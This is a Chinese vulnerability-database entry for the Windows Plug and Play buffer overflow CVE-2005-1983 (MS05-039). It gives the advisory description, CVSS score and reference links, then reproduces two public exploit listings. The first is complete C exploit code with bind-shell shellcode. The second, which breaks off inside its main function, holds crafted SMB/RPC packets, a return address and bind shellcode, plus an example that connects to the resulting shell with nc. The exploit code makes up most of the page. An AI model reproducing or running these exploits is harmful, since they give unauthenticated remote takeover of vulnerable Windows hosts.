CVE-2005-1983
CVSS10.0
发布时间 :2005-08-10 00:00:00
修订时间 :2011-03-07 21:23:11
NMCOEPS    

[原文]Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm.


[CNNVD]Microsoft Windows 缓冲区溢出漏洞(CNNVD-200508-080)

        Microsoft Windows即插即用(PnP)功能允许操作系统在安装新硬件时能够检测到这些设备。
        Microsoft Windows即插即用功能中存在缓冲区溢出漏洞,成功利用这个漏洞的攻击者可以完全控制受影响的系统。起因是PnP服务处理包含有过多数据的畸形消息的方式。在Windows 2000上,匿名用户可以通过发送特制消息来利用这个漏洞;在Windows XP Service Pack 1上,只有通过认证的用户才能发送恶意消息;在Windows XP Service Pack 2和Windows Server 2003上,攻击者必需本地登陆到系统然后运行特制的应用程序才能利用这个漏洞。目前已经出现了利用此漏洞进行传播的网络蠕虫。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_xp::sp1:tablet_pcMicrosoft windows xp_sp1 tablet_pc

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:783Windows Server 2003 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:497Windows XP,SP2 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:474Windows 2000 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:267Windows XP Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:160Windows Server 2003 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:100073Windows XP (64-bit) PnP Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1983
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1983
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-080
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA05-221A.html
(PATCH)  CERT  TA05-221A
http://www.kb.cert.org/vuls/id/998653
(UNKNOWN)  CERT-VN  VU#998653
http://www.microsoft.com/technet/Security/bulletin/ms05-039.mspx
(PATCH)  MS  MS05-039
http://www.vupen.com/english/advisories/2005/1354
(UNKNOWN)  VUPEN  ADV-2005-1354
http://xforce.iss.net/xforce/xfdb/21602
(UNKNOWN)  XF  win-plugandplay-bo(21602)
http://xforce.iss.net/xforce/alerts/id/202
(UNKNOWN)  ISS  20050809 Windows Plug and Play Remote Compromise
http://www.securityfocus.com/bid/14513
(UNKNOWN)  BID  14513
http://www.securiteam.com/windowsntfocus/5YP0E00GKW.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5YP0E00GKW.html
http://www.osvdb.org/18605
(UNKNOWN)  OSVDB  18605
http://www.hsc.fr/ressources/presentations/null_sessions/
(UNKNOWN)  MISC  http://www.hsc.fr/ressources/presentations/null_sessions/
http://www.frsirt.com/english/alerts/20050814.ZotobA.php
(UNKNOWN)  MISC  http://www.frsirt.com/english/alerts/20050814.ZotobA.php
http://www.ciac.org/ciac/bulletins/p-266.shtml
(UNKNOWN)  CIAC  P-266
http://securitytracker.com/id?1014640
(UNKNOWN)  SECTRACK  1014640
http://secunia.com/advisories/16372
(UNKNOWN)  SECUNIA  16372
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0384.html
(UNKNOWN)  FULLDISC  20050811 Windows 2000 universal exploit for MS05-039

- 漏洞信息

Microsoft Windows 缓冲区溢出漏洞
危急 缓冲区溢出
2005-08-10 00:00:00 2005-10-20 00:00:00
远程※本地  
        Microsoft Windows即插即用(PnP)功能允许操作系统在安装新硬件时能够检测到这些设备。
        Microsoft Windows即插即用功能中存在缓冲区溢出漏洞,成功利用这个漏洞的攻击者可以完全控制受影响的系统。起因是PnP服务处理包含有过多数据的畸形消息的方式。在Windows 2000上,匿名用户可以通过发送特制消息来利用这个漏洞;在Windows XP Service Pack 1上,只有通过认证的用户才能发送恶意消息;在Windows XP Service Pack 2和Windows Server 2003上,攻击者必需本地登陆到系统然后运行特制的应用程序才能利用这个漏洞。目前已经出现了利用此漏洞进行传播的网络蠕虫。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx?pf=true

- 漏洞信息 (1146)

MS Windows Plug-and-Play Service Remote Overflow (MS05-039) (EDBID:1146)
windows remote
2005-08-11 Verified
139 sl0ppy
N/A [点击下载]
/*
Windows 2000 universal exploit for MS05-039
-\x6d\x35\x6c\x30\x6e\x6e\x79-
*/

#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winnetwk.h>
#include <winsock.h>
#include <Rpc.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

BYTE Data1[0x68] =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,
 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
struct DataStruct1
{
       BYTE SomeString[0x30];
       DWORD RESDataType;
       DWORD LFD;
       DWORD SDM1;
       DWORD SDO;
       DWORD SDL;
       DWORD SDM2;
       BYTE  SDA[0x07D0];
       DWORD LRD;
       DWORD MB;
       DWORD DM;
};
struct RPCBIND
{
       BYTE VerMaj;
       BYTE VerMin;
       BYTE PacketType;
       BYTE PacketFlags;
       DWORD DataRep;
       WORD FragLength;
       WORD AuthLength;
       DWORD CallID;
       WORD MaxXmitFrag;
       WORD MaxRecvFrag;
       DWORD AssocGroup;
       BYTE NumCtxItems;
       WORD ContextID;
       WORD NumTransItems;
       GUID InterfaceUUID;
       WORD InterfaceVerMaj;
       WORD InterfaceVerMin;
       GUID TransferSyntax;
       DWORD SyntaxVer;
};
//from metasploit, before you were born
BYTE BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"};
BYTE PRPC[0x48] =
{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
struct RPCFUNC
{
       BYTE VerMaj;
       BYTE VerMin;
       BYTE PacketType;
       BYTE PacketFlags;
       DWORD DataRep;
       WORD FragLength;
       WORD AuthLength;
       DWORD CallID;
       DWORD AllocHint;
       WORD ContextID;
       WORD Opnum;
};
BYTE POP[0x27] =
{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00,
 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00,
 0x05,0x08,0x00,0x00,0x41,0x00,0x41};

int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
       BYTE rbuf[0x1000];
       DWORD dw;
       struct RPCBIND RPCBind;

       memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
       UuidFromString(Interface,&RPCBind.InterfaceUUID);
       UuidToString(&RPCBind.InterfaceUUID,&Interface);
       RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
       RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
       TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);
       return 0;
}

int Attack(HANDLE PipeHandle)
{
       struct RPCFUNC RPCOP;
       int bwritten=0;
       BYTE *LargeBuffer;
       BYTE rbuf[0x100];
       DWORD dw;
       struct DataStruct1 EvilRPC;

       memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));
       EvilRPC.SDL=0x07C0;
       memset(EvilRPC.SDA,0x90,0x07D0);
       EvilRPC.SDA[76]=0x3e;
       EvilRPC.SDA[77]=0x1e;
       EvilRPC.SDA[78]=0x02;
       EvilRPC.SDA[79]=0x75;
       memset(EvilRPC.SDA+80,0x90,10);
       EvilRPC.SDA[90]=0x90;
       memcpy(EvilRPC.SDA+94,BindShell,374);
       EvilRPC.MB=0x00000004;
       EvilRPC.DM=0x00000000;
       EvilRPC.LFD=0x000007E0;
       EvilRPC.LRD=0x000007E0;
       memcpy(&RPCOP,&POP,sizeof(RPCOP));
       RPCOP.Opnum = 54;
       RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);
       RPCOP.AllocHint=sizeof(EvilRPC);
       LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));
       memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));
       memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));
       memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));
       printf("Sending payload...\nThis has to time out... ctrl+c after 5 secs\ncheck for shell on port 8721");
       TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);
       free(LargeBuffer);
       return 0;
}


int main(int argc, char* argv[])
{
       char *server;
       NETRESOURCE nr;
       char unc[MAX_PATH];
       char szPipe[MAX_PATH];
       HANDLE hFile;

       if (argc < 2)
       {
               printf("Usage: %s <host>\n", argv[0]);
               return 1;
       }
       server=argv[1];
       _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
       unc[sizeof(unc)-1] = 0;
       nr.dwType       = RESOURCETYPE_ANY;
       nr.lpLocalName  = NULL;
       nr.lpRemoteName = unc;
       nr.lpProvider   = NULL;
       WNetAddConnection2(&nr, "", "", 0);

       _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);
       hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

       BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");

       //SendMalformed RPC request
       Attack(hFile);
       return 0;
}

// milw0rm.com [2005-08-11]
		

- 漏洞信息 (1179)

MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix) (EDBID:1179)
windows remote
2005-08-25 Verified
445 RoMaNSoFt
N/A [点击下载]
/*
 * HOD-ms05039-pnp-expl-spanish.c [25.Aug.2005]
 * Very slightly modified version by Roman Medina <roman@rs-labs.com>
 * Tested on Win2k SP4 Spanish.
 * Original credits & comments follow.
 */


/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
 *
 * Copyright (c) 2005 houseofdabus.
 *
 * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
 * Universal Exploit + no crash shellcode
 *
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution and local elevation of privilege
 *    vulnerability exists in Plug and Play that could allow an
 *    attacker who successfully exploited this vulnerability to take
 *    complete control of the affected system.
 *
 *    This is a remote code execution and local privilege elevation
 *    vulnerability. On Windows 2000, an anonymous attacker could
 *    remotely try to exploit this vulnerability.
 *
 *    On Windows XP Service Pack 1, only an authenticated user could
 *    remotely try to exploit this vulnerability.
 *    On Window XP Service Pack 2 and Windows Server 2003, only an
 *    administrator can remotely access the affected component.
 *    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
 *    this is strictly a local privilege elevation vulnerability.
 *    An anonymous user cannot remotely attempt to exploit this
 *    vulnerability on Windows XP Service Pack 2 and Windows
 *    Server 2003.
 *
 * ---------------------------------------------------------------------
 * Solution:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
 *
 * ---------------------------------------------------------------------
 * Systems Affected:
 *    - Windows Server 2003, SP1
 *    - Windows XP SP1, SP2
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
 *
 * [*] connecting to 192.168.0.22:445...ok
 * [*] null session...ok
 * [*] bind pipe...ok
 * [*] sending crafted packet...ok
 * [*] check your shell on 192.168.0.1:7777
 * Ctrl+C
 *
 * C:\>nc 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>
 *
 * ---------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 */

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif


unsigned char SMB_Negotiate[] =
	"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
	"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
	"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
	"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
	"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
	"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
	"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";


unsigned char SMB_SessionSetupAndX[] =
	"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
	"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
	"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
	"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
	"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
	"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
	"\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_SessionSetupAndX2[] =
	"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
	"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
	"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
	"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
	"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
	"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
	"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
	"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
	"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
	"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
	"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
	"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_TreeConnectAndX[] =
	"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";



unsigned char SMB_TreeConnectAndX_[] =
	"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";


/* browser */
unsigned char SMB_PipeRequest_browser[] =
	"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
	"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
	"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
	"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";


unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
	"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
	"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
	"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
	"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
	"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
	"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";



unsigned char RPC_call[] =
	"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
	"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
	"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
	"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
	"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
	"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
	"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"

	/* jmp over - entry point */
	"\xEB\x08\x90\x90"

	/* pop reg; pop reg; retn; - umpnpmgr.dll */
	"\x67\x15\x77\x76" /* 0x767a1567 */

	/* jmp ebx - umpnpmgr.dll (BROKEN)
	"\x6f\x36\x77\x76" */

	"\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


unsigned char RPC_call_end[] =
	"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";


unsigned char bind_shellcode[] =
	"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
	"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
	"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
	"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
	"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
	"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
	"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
	"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
	"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
	"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
	"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
	"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
	"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
	"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
	"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
	"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
	"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
	"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
	"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
	"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
	"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
	"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";

#define SET_PORTBIND_PORT(buf, port) \
	*(unsigned short *)(((buf)+186)) = (port)


void
convert_name(char *out, char *name)
{
	unsigned long len;

	len = strlen(name);
	out += len * 2 - 1;
	while (len--) {
		*out-- = '\x00';
		*out-- = name[len];
	}
}



int
main (int argc, char **argv)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
#endif

	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	printf("\t         Universal Exploit + no crash shellcode\n\n");
	printf("\t         [Spanish hack by RoMaNSoFt :-)]\n\n\n");
	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}

